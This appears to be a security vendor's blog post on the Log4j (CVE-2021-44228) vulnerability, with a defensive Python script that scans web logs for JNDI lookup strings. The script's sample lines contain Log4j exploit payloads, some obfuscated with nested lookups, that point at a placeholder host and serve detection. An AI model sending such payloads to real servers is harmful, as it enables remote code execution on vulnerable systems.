A fresh zero-day attack with the ability to jeopardize the everyday operation of companies globally is in the news this week. Security researchers recently disclosed the vulnerability CVE-2021-44228 in Apache's Log4j, a widely used Java-based logging library. To exploit it, an attacker only needs to get a specially crafted string into data that the application logs. Specifically, the flaw lies in Log4j's support for Java Naming and Directory Interface (JNDI) lookups, which can resolve names over LDAP.
This exploit was first publicized when Minecraft players were warned that hackers could execute malicious code on servers or clients running the Java version of the game. A patch quickly remedied the issue for the game's users, but many other systems rely on this same logging library.
Amazon Web Services, Microsoft, Cisco, Google Cloud and IBM were among the major tech players affected by the Log4j vulnerability. Wired reported that the exploit "will continue to wreak havoc across the internet for years to come." In a statement, US Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly described the flaw as "one of the most serious I've seen in my entire career, if not the most serious."
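As an added example that is not part of the original post or Calyptix's own tooling, the following Python script shows how a defender can check application or web-server logs for the crafted lookup string described above. It goes slightly beyond the literal `${jndi:` text by first collapsing nested Log4j-style lookups (`${lower:..}`, `${upper:..}`, `${..:-..}`) that would otherwise hide that text from a naive match; the log lines are constructed, and `example.invalid` is a placeholder host.

```python
import re

# Constructed sample log lines (not real traffic): one benign request and three
# that carry a JNDI lookup in the User-Agent field, two of them wrapped in
# nested lookups so the plain text "${jndi:" does not appear literally.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03] "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04] "GET / HTTP/1.1" 200 "${${::-j}${::-n}di:dns://example.invalid/c}"',
]

# Innermost lookups whose result is static text: ${lower:x}, ${upper:x}, ${name:-default}.
INNER = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
# The lookup prefix Log4j would act on, plus the scheme (ldap, rmi, dns, ...) that follows it.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
SCHEME = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(match):
    kind, arg, default = match.group(1), match.group(2), match.group(3)
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return default  # ${name:-default} evaluates to its default text


def normalize(text, max_rounds=10):
    """Repeatedly resolve static inner lookups so the literal text a vulnerable
    Log4j would see becomes visible. Bounded to avoid looping on odd input."""
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_suspicious(line):
    return bool(JNDI.search(normalize(line)))


def lookup_scheme(line):
    """Return the JNDI scheme a suspicious line points at (e.g. 'ldap'), else None."""
    m = SCHEME.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (1-based line number, normalized line) for each suspicious entry."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_suspicious(l)]


if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOGS):
        print(f"line {n}: scheme={lookup_scheme(hit)} :: {hit}")
```

A hit in these logs only means an attempt was logged, not that it succeeded; the fix remains patching Log4j and restricting outbound LDAP/RMI/DNS from servers, as the post describes.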
What is a Zero-day Exploit?
Bad actors are determined to get into systems and networks. They probe persistently until they find a previously unknown and unpatched flaw that gives them access to your system. Once they find a vulnerability, they rush to write and deploy an attack before the developer discovers the flaw.
This type of attack hurts business because it causes damage before you even know it is there; the developer has had zero days to fix the flaw, which is why it is called a zero-day attack. Regrettably, it can take weeks, even months, to discover the attack.
What to do about Zero-day Attacks
CISA has an in-depth article that explains the origin of this exploit and gives guidance on what to do if you believe you have a system that may be affected.
In the meantime, you should always keep software up to date with security updates and patches to limit exposure to this and other types of cyberattack.
It is also best to limit the number of software applications you download. The more you use, the greater your risk of exposure.
You will also want to install a firewall to help maximize your system protection. Firewalls feature various automated tools that use whitelisting to decide which apps should be granted or refused internet access. Installing antivirus tools also helps block threats and keep your devices secure. While most of these actions are automated, users should make judicious use of outbound filtering to limit which external resources their devices can reach. This is where Calyptix's Community Shield really shines, by utilizing the fleet of AccessEnforcer firewalls to identify and block outbound events that could compromise your network.
Here are some things that MSPs and IT managers can do to respond to this vulnerability:
Calyptix Protection Against Log4j
Calyptix’s developers reviewed this vulnerability and have concluded that no systems within the AccessEnforcer line are affected. Adjacent systems such as Geo Fence, Gatekeeper, Community Shield and our backend systems are also unaffected.
To further ensure protection, we rolled out a blocklist of publicly known Log4j scanners and exploits on Friday, December 10th. Since then, our developers have continued working hard to build a threat feed specifically for this exploit as it pertains to outbound events.
| System           | Status       |
| Geo Fence        | Not Affected |
| Community Shield | Not Affected |
| Web Filters      | Not Affected |
| Web Server       | Not Affected |
Calyptix’s AccessEnforcer is an all-in-one solution for network security and management. Our mission is to automatically block threats like hackers, spam, and malware. Our network tools keep small business connections fast and reliable. With Community Shield™ we have added a community-driven, proactive feature to further defend users.
Check out our Community Shield™ Log4j Dashboards.